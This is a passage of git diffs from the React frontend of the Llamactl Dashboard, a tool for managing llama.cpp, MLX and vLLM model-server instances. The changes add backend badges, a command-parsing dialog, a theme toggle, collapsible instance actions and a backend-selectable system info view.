const deleteButtons = screen.getAllByTitle('Delete instance')
await user.click(deleteButtons[0])
// First click the "More actions" button to reveal the delete button
const moreActionsButtons = screen.getAllByTitle('More actions')
await user.click(moreActionsButtons[0])
// Wait for the delete button to appear and click it
await waitFor(() => {
expect(screen.getByTitle('Delete instance')).toBeInTheDocument()
})
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
// Verify confirmation and API call
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance-1"?')


@@ -0,0 +1,65 @@
import React from "react";
import { Badge } from "@/components/ui/badge";
import { BackendType, type BackendTypeValue } from "@/types/instance";
import { Server, Package } from "lucide-react";
interface BackendBadgeProps {
backend?: BackendTypeValue;
docker?: boolean;
}
const BackendBadge: React.FC<BackendBadgeProps> = ({ backend, docker }) => {
if (!backend) {
return null;
}
const getText = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "llama.cpp";
case BackendType.MLX_LM:
return "MLX";
case BackendType.VLLM:
return "vLLM";
default:
return backend;
}
};
const getColorClasses = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "bg-blue-100 text-blue-800 border-blue-200 dark:bg-blue-900 dark:text-blue-200 dark:border-blue-800";
case BackendType.MLX_LM:
return "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800";
case BackendType.VLLM:
return "bg-purple-100 text-purple-800 border-purple-200 dark:bg-purple-900 dark:text-purple-200 dark:border-purple-800";
default:
return "bg-gray-100 text-gray-800 border-gray-200 dark:bg-gray-900 dark:text-gray-200 dark:border-gray-800";
}
};
return (
<div className="flex items-center gap-1">
<Badge
variant="outline"
className={`flex items-center gap-1.5 ${getColorClasses()}`}
>
<Server className="h-3 w-3" />
<span className="text-xs">{getText()}</span>
</Badge>
{docker && (
<Badge
variant="outline"
className="flex items-center gap-1.5 bg-orange-100 text-orange-800 border-orange-200 dark:bg-orange-900 dark:text-orange-200 dark:border-orange-800"
title="Docker enabled"
>
<Package className="h-3 w-3" />
<span className="text-[10px] uppercase tracking-wide">Docker</span>
</Badge>
)}
</div>
);
};
export default BackendBadge;


@@ -2,24 +2,23 @@ import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
fieldKey: keyof CreateInstanceOptions
value: any
onChange: (key: keyof CreateInstanceOptions, value: any) => void
interface BackendFormFieldProps {
fieldKey: string
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getFieldType(fieldKey)
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: any) => {
onChange(fieldKey, newValue)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
@@ -29,7 +28,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={value || false}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -46,15 +45,18 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
value={value || ''}
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
handleChange(numValue)
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
@@ -69,7 +71,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -96,12 +97,11 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={value || ''}
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
@@ -116,4 +116,4 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
return <div className="space-y-2">{renderField()}</div>
}
export default ZodFormField
export default BackendFormField


@@ -1,6 +1,7 @@
import { Button } from "@/components/ui/button";
import { HelpCircle, LogOut } from "lucide-react";
import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext";
import { useTheme } from "@/contexts/ThemeContext";
interface HeaderProps {
onCreateInstance: () => void;
@@ -9,6 +10,7 @@ interface HeaderProps {
function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
const { logout } = useAuth();
const { theme, toggleTheme } = useTheme();
const handleLogout = () => {
if (confirm("Are you sure you want to logout?")) {
@@ -17,10 +19,10 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
};
return (
<header className="bg-white border-b border-gray-200">
<header className="bg-card border-b border-border">
<div className="container mx-auto max-w-4xl px-4 py-4">
<div className="flex items-center justify-between">
<h1 className="text-2xl font-bold text-gray-900">
<h1 className="text-2xl font-bold text-foreground">
Llamactl Dashboard
</h1>
@@ -29,6 +31,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
Create Instance
</Button>
<Button
variant="outline"
size="icon"
onClick={toggleTheme}
data-testid="theme-toggle-button"
title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
>
{theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
</Button>
<Button
variant="outline"
size="icon"


@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />;
case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
}
};
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive";
case "unknown":
return "secondary";
case "failed":
return "destructive";
}
};
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error";
case "unknown":
return "Unknown";
case "failed":
return "Failed";
}
};


@@ -2,9 +2,10 @@
import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal } from "lucide-react";
import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge";
import BackendBadge from "@/components/BackendBadge";
import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
@@ -24,7 +25,8 @@ function InstanceCard({
editInstance,
}: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false);
const health = useInstanceHealth(instance.name, instance.running);
const [showAllActions, setShowAllActions] = useState(false);
const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => {
startInstance(instance.name);
@@ -50,38 +52,48 @@ function InstanceCard({
setIsLogsOpen(true);
};
const running = instance.status === "running";
return (
<>
<Card>
<CardHeader className="pb-3">
<div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle>
{instance.running && <HealthBadge health={health} />}
<Card className="hover:shadow-md transition-shadow">
<CardHeader className="pb-4">
{/* Header with instance name and status badges */}
<div className="space-y-3">
<CardTitle className="text-lg font-semibold leading-tight break-words">
{instance.name}
</CardTitle>
{/* Badges row */}
<div className="flex items-center gap-2 flex-wrap">
<BackendBadge backend={instance.options?.backend_type} docker={instance.docker_enabled} />
{running && <HealthBadge health={health} />}
</div>
</div>
</CardHeader>
<CardContent>
<div className="flex gap-1">
<CardContent className="pt-0">
{/* Primary actions - always visible */}
<div className="flex items-center gap-2 mb-3">
<Button
size="sm"
variant="outline"
onClick={handleStart}
disabled={instance.running}
title="Start instance"
data-testid="start-instance-button"
variant={running ? "outline" : "default"}
onClick={running ? handleStop : handleStart}
className="flex-1"
title={running ? "Stop instance" : "Start instance"}
data-testid={running ? "stop-instance-button" : "start-instance-button"}
>
<Play className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="outline"
onClick={handleStop}
disabled={!instance.running}
title="Stop instance"
data-testid="stop-instance-button"
>
<Square className="h-4 w-4" />
{running ? (
<>
<Square className="h-4 w-4 mr-1" />
Stop
</>
) : (
<>
<Play className="h-4 w-4 mr-1" />
Start
</>
)}
</Button>
<Button
@@ -97,24 +109,40 @@ function InstanceCard({
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
onClick={() => setShowAllActions(!showAllActions)}
title="More actions"
>
<FileText className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={instance.running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
<MoreHorizontal className="h-4 w-4" />
</Button>
</div>
{/* Secondary actions - collapsible */}
{showAllActions && (
<div className="flex items-center gap-2 pt-2 border-t border-border">
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
className="flex-1"
>
<FileText className="h-4 w-4 mr-1" />
Logs
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
</Button>
</div>
)}
</CardContent>
</Card>
@@ -122,7 +150,7 @@ function InstanceCard({
open={isLogsOpen}
onOpenChange={setIsLogsOpen}
instanceName={instance.name}
isRunning={instance.running}
isRunning={running}
/>
</>
);


@@ -1,7 +1,5 @@
import React, { useState, useEffect } from "react";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
@@ -10,10 +8,10 @@ import {
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField";
import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import ParseCommandDialog from "@/components/ParseCommandDialog";
import InstanceSettingsCard from "@/components/instance/InstanceSettingsCard";
import BackendConfigurationCard from "@/components/instance/BackendConfigurationCard";
interface InstanceDialogProps {
open: boolean;
@@ -29,16 +27,12 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance,
}) => {
const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({});
const [showAdvanced, setShowAdvanced] = useState(false);
const [nameError, setNameError] = useState("");
const [showParseDialog, setShowParseDialog] = useState(false);
// Get field lists dynamically from the type
const basicFields = getBasicFields();
const advancedFields = getAdvancedFields();
// Reset form when dialog opens/closes or when instance changes
useEffect(() => {
@@ -52,17 +46,39 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName("");
setFormData({
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
});
}
setShowAdvanced(false); // Always start with basic view
setNameError(""); // Reset any name errors
}
}, [open, instance]);
const handleFieldChange = (key: keyof CreateInstanceOptions, value: any) => {
setFormData((prev) => {
// If backend_type is changing, clear backend_options
if (key === 'backend_type' && prev.backend_type !== value) {
return {
...prev,
[key]: value,
backend_options: {}, // Clear backend options when backend type changes
};
}
return {
...prev,
[key]: value,
};
});
};
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
[key]: value,
backend_options: {
...prev.backend_options,
[key]: value,
} as any,
}));
};
@@ -90,7 +106,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) {
if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) {
return;
@@ -107,12 +140,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
onOpenChange(false);
};
const toggleAdvanced = () => {
setShowAdvanced(!showAdvanced);
const handleCommandParsed = (parsedOptions: CreateInstanceOptions) => {
setFormData(prev => ({
...prev,
...parsedOptions,
}));
setShowParseDialog(false);
};
// Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return (
<Dialog open={open} onOpenChange={onOpenChange}>
@@ -129,125 +175,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
</DialogHeader>
<div className="flex-1 overflow-y-auto">
<div className="grid gap-6 py-4">
{/* Instance Name - Special handling since it's not in CreateInstanceOptions */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
<Input
id="name"
value={instanceName}
onChange={(e) => handleNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing} // Don't allow name changes when editing
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
<div className="space-y-6 py-4">
{/* Instance Settings Card */}
<InstanceSettingsCard
instanceName={instanceName}
nameError={nameError}
isEditing={isEditing}
formData={formData}
onNameChange={handleNameChange}
onChange={handleFieldChange}
/>
{/* Auto Restart Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">
Auto Restart Configuration
</h3>
{/* Backend Configuration Card */}
<BackendConfigurationCard
formData={formData}
onBackendFieldChange={handleBackendFieldChange}
onChange={handleFieldChange}
onParseCommand={() => setShowParseDialog(true)}
/>
{/* Auto Restart Toggle */}
<ZodFormField
fieldKey="auto_restart"
value={formData.auto_restart}
onChange={handleFieldChange}
/>
{/* Show restart options only when auto restart is enabled */}
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<ZodFormField
fieldKey="max_restarts"
value={formData.max_restarts}
onChange={handleFieldChange}
/>
<ZodFormField
fieldKey="restart_delay"
value={formData.restart_delay}
onChange={handleFieldChange}
/>
</div>
)}
</div>
{/* Basic Fields - Automatically generated from type (excluding auto restart options) */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Configuration</h3>
{basicFields
.filter(
(fieldKey) =>
fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay"
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */}
<div className="border-t pt-4">
<Button
variant="ghost"
onClick={toggleAdvanced}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Configuration
<span className="text-muted-foreground text-sm font-normal">
(
{
advancedFields.filter(
(f) =>
!["max_restarts", "restart_delay"].includes(f as string)
).length
}{" "}
options)
</span>
</Button>
</div>
{/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4">
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay"].includes(
fieldKey as string
)
) // Exclude restart options as they're handled above
.sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
</div>
)}
</div>
</div>
@@ -264,14 +210,17 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button"
>
{isEditing
? isRunning
? "Update & Restart Instance"
: "Update Instance"
: "Create Instance"}
{saveButtonLabel}
</Button>
</DialogFooter>
</DialogContent>
<ParseCommandDialog
open={showParseDialog}
onOpenChange={setShowParseDialog}
onParsed={handleCommandParsed}
backendType={formData.backend_type || BackendType.LLAMA_CPP}
/>
</Dialog>
);
};


@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
return (
<div className="flex items-center justify-center py-12" aria-label="Loading">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading instances...</p>
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading instances...</p>
</div>
</div>
)
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (error) {
return (
<div className="text-center py-12">
<div className="text-red-600 mb-4">
<div className="text-destructive mb-4">
<p className="text-lg font-semibold">Error loading instances</p>
<p className="text-sm">{error}</p>
</div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (instances.length === 0) {
return (
<div className="text-center py-12">
<p className="text-gray-600 text-lg mb-2">No instances found</p>
<p className="text-gray-500 text-sm">Create your first instance to get started</p>
<p className="text-foreground text-lg mb-2">No instances found</p>
<p className="text-muted-foreground text-sm">Create your first instance to get started</p>
</div>
)
}
return (
<div className="space-y-4">
<h2 className="text-xl font-semibold text-gray-900 mb-6">
<h2 className="text-xl font-semibold text-foreground mb-6">
Instances ({instances.length})
</h2>


@@ -11,6 +11,7 @@ import {
DialogTitle,
} from '@/components/ui/dialog'
import { Badge } from '@/components/ui/badge'
import { instancesApi } from '@/lib/api'
import {
RefreshCw,
Download,
@@ -46,48 +47,44 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
const refreshIntervalRef = useRef<NodeJS.Timeout | null>(null)
// Fetch logs function
const fetchLogs = async (lines?: number) => {
if (!instanceName) return
setLoading(true)
setError(null)
try {
const params = lines ? `?lines=${lines}` : ''
const response = await fetch(`/api/v1/instances/${instanceName}/logs${params}`)
const fetchLogs = React.useCallback(
async (lines?: number) => {
if (!instanceName) return
if (!response.ok) {
throw new Error(`Failed to fetch logs: ${response.status}`)
setLoading(true)
setError(null)
try {
const logText = await instancesApi.getLogs(instanceName, lines)
setLogs(logText)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
const logText = await response.text()
setLogs(logText)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
}
},
[instanceName]
)
// Initial load when dialog opens
useEffect(() => {
if (open && instanceName) {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}
}, [open, instanceName])
}, [open, instanceName, fetchLogs, lineCount])
// Auto-refresh effect
useEffect(() => {
if (autoRefresh && isRunning && open) {
refreshIntervalRef.current = setInterval(() => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}, 2000) // Refresh every 2 seconds
} else {
if (refreshIntervalRef.current) {
@@ -101,7 +98,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
clearInterval(refreshIntervalRef.current)
}
}
}, [autoRefresh, isRunning, open, lineCount])
}, [autoRefresh, isRunning, open, lineCount, fetchLogs])
// Copy logs to clipboard
const copyLogs = async () => {
@@ -135,7 +132,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
// Apply new line count
const applyLineCount = () => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
setShowSettings(false)
}
@@ -198,7 +195,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<Button
variant="outline"
size="sm"
onClick={() => fetchLogs(lineCount)}
onClick={() => void fetchLogs(lineCount)}
disabled={loading}
>
{loading ? (
@@ -290,7 +287,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<div className="flex items-center gap-2 w-full">
<Button
variant="outline"
onClick={copyLogs}
onClick={() => void copyLogs()}
disabled={!logs}
>
{copied ? (


@@ -0,0 +1,151 @@
import React, { useState } from "react";
import { Button } from "@/components/ui/button";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import { BackendType, type BackendTypeValue, type CreateInstanceOptions } from "@/types/instance";
import { backendsApi } from "@/lib/api";
import { toast } from "sonner";
interface ParseCommandDialogProps {
open: boolean;
onOpenChange: (open: boolean) => void;
onParsed: (options: CreateInstanceOptions) => void;
backendType: BackendTypeValue;
}
const ParseCommandDialog: React.FC<ParseCommandDialogProps> = ({
open,
onOpenChange,
onParsed,
backendType,
}) => {
const [command, setCommand] = useState('');
const [loading, setLoading] = useState(false);
const [error, setError] = useState<string | null>(null);
const handleParse = async () => {
if (!command.trim()) {
setError("Command cannot be empty");
return;
}
setLoading(true);
setError(null);
try {
let options: CreateInstanceOptions;
// Parse based on selected backend type
switch (backendType) {
case BackendType.LLAMA_CPP:
options = await backendsApi.llamaCpp.parseCommand(command);
break;
case BackendType.MLX_LM:
options = await backendsApi.mlx.parseCommand(command);
break;
case BackendType.VLLM:
options = await backendsApi.vllm.parseCommand(command);
break;
default:
throw new Error(`Unsupported backend type: ${backendType}`);
}
onParsed(options);
onOpenChange(false);
setCommand('');
setError(null);
toast.success('Command parsed successfully');
} catch (err) {
const errorMessage = err instanceof Error ? err.message : 'Failed to parse command';
setError(errorMessage);
toast.error('Failed to parse command', {
description: errorMessage
});
} finally {
setLoading(false);
}
};
const handleOpenChange = (open: boolean) => {
if (!open) {
setCommand('');
setError(null);
}
onOpenChange(open);
};
const backendPlaceholders: Record<BackendTypeValue, string> = {
[BackendType.LLAMA_CPP]: "llama-server --model /path/to/model.gguf --gpu-layers 32 --ctx-size 4096",
[BackendType.MLX_LM]: "mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --host 0.0.0.0 --port 8080",
[BackendType.VLLM]: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2 --gpu-memory-utilization 0.9",
};
const getPlaceholderForBackend = (backendType: BackendTypeValue): string => {
return backendPlaceholders[backendType] || "Enter your command here...";
};
return (
<Dialog open={open} onOpenChange={handleOpenChange}>
<DialogContent className="sm:max-w-[600px]">
<DialogHeader>
<DialogTitle>Parse Backend Command</DialogTitle>
<DialogDescription>
Select your backend type and paste the command to automatically populate the form fields
</DialogDescription>
</DialogHeader>
<div className="space-y-4">
<div>
<Label className="text-sm font-medium">Backend Type:
<span className="font-normal text-muted-foreground">
{backendType === BackendType.LLAMA_CPP && 'Llama Server'}
{backendType === BackendType.MLX_LM && 'MLX LM'}
{backendType === BackendType.VLLM && 'vLLM'}
</span>
</Label>
</div>
<div>
<Label htmlFor="command">Command</Label>
<textarea
id="command"
value={command}
onChange={(e) => setCommand(e.target.value)}
placeholder={getPlaceholderForBackend(backendType)}
className="w-full h-32 p-3 mt-2 border border-input rounded-md font-mono text-sm resize-vertical focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2"
/>
</div>
{error && (
<div className="text-destructive text-sm bg-destructive/10 p-3 rounded-md">
{error}
</div>
)}
</div>
<DialogFooter>
<Button variant="outline" onClick={() => handleOpenChange(false)}>
Cancel
</Button>
<Button
onClick={() => {
handleParse().catch(console.error);
}}
disabled={!command.trim() || loading}
>
{loading ? 'Parsing...' : 'Parse Command'}
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
);
};
export default ParseCommandDialog;


@@ -8,166 +8,257 @@ import {
DialogHeader,
DialogTitle,
} from '@/components/ui/dialog'
import {
RefreshCw,
import SelectInput from '@/components/form/SelectInput'
import {
RefreshCw,
AlertCircle,
Loader2,
ChevronDown,
ChevronRight,
Monitor,
HelpCircle
HelpCircle,
Info
} from 'lucide-react'
import { serverApi } from '@/lib/api'
import { BackendType, type BackendTypeValue } from '@/types/instance'
interface SystemInfoModalProps {
// Helper to get version from environment
const getAppVersion = (): string => {
try {
return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
} catch {
return 'unknown'
}
}
interface SystemInfoDialogProps {
open: boolean
onOpenChange: (open: boolean) => void
}
interface SystemInfo {
interface BackendInfo {
version: string
devices: string
help: string
}
const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
const BACKEND_OPTIONS = [
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' },
]
const SystemInfoDialog: React.FC<SystemInfoDialogProps> = ({
open,
onOpenChange
}) => {
const [systemInfo, setSystemInfo] = useState<SystemInfo | null>(null)
const [selectedBackend, setSelectedBackend] = useState<BackendTypeValue>(BackendType.LLAMA_CPP)
const [backendInfo, setBackendInfo] = useState<BackendInfo | null>(null)
const [loading, setLoading] = useState(false)
const [error, setError] = useState<string | null>(null)
const [showHelp, setShowHelp] = useState(false)
// Fetch system info
const fetchSystemInfo = async () => {
// Fetch backend info
const fetchBackendInfo = async (backend: BackendTypeValue) => {
if (backend !== BackendType.LLAMA_CPP) {
setBackendInfo(null)
setError(null)
return
}
setLoading(true)
setError(null)
try {
const [version, devices, help] = await Promise.all([
serverApi.getVersion(),
serverApi.getDevices(),
serverApi.getHelp()
])
setSystemInfo({ version, devices, help })
setBackendInfo({ version, devices, help })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch system info')
setError(err instanceof Error ? err.message : 'Failed to fetch backend info')
} finally {
setLoading(false)
}
}
// Load data when dialog opens
// Load data when dialog opens or backend changes
useEffect(() => {
if (open) {
fetchSystemInfo()
void fetchBackendInfo(selectedBackend)
}
}, [open])
}, [open, selectedBackend])
const handleBackendChange = (value: string) => {
setSelectedBackend(value as BackendTypeValue)
setShowHelp(false) // Reset help section when switching backends
}
const renderBackendSpecificContent = () => {
if (selectedBackend !== BackendType.LLAMA_CPP) {
return (
<div className="flex items-center justify-center py-8">
<div className="text-center space-y-3">
<Info className="h-8 w-8 text-gray-400 mx-auto" />
<div>
<h3 className="font-semibold text-gray-700">Backend Info Not Available</h3>
<p className="text-sm text-gray-500 mt-1">
Information for the {BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} backend is not yet implemented.
</p>
</div>
</div>
</div>
)
}
if (loading && !backendInfo) {
return (
<div className="flex items-center justify-center py-8">
<Loader2 className="h-6 w-6 animate-spin text-gray-400" />
<span className="ml-2 text-gray-400">Loading backend information...</span>
</div>
)
}
if (error) {
return (
<div className="flex items-center gap-2 p-4 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive" />
<span className="text-sm text-destructive">{error}</span>
</div>
)
}
if (!backendInfo) {
return null
}
return (
<div className="space-y-6">
{/* Backend Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">
{BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} Version
</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --version</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.version}
</pre>
</div>
</div>
{/* Devices Section */}
<div className="space-y-3">
<div className="flex items-center gap-2">
<h3 className="font-semibold">Available Devices</h3>
</div>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --list-devices</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.devices}
</pre>
</div>
</div>
{/* Help Section */}
<div className="space-y-3">
<Button
variant="ghost"
onClick={() => setShowHelp(!showHelp)}
className="flex items-center gap-2 p-0 h-auto font-semibold"
>
{showHelp ? (
<ChevronDown className="h-4 w-4" />
) : (
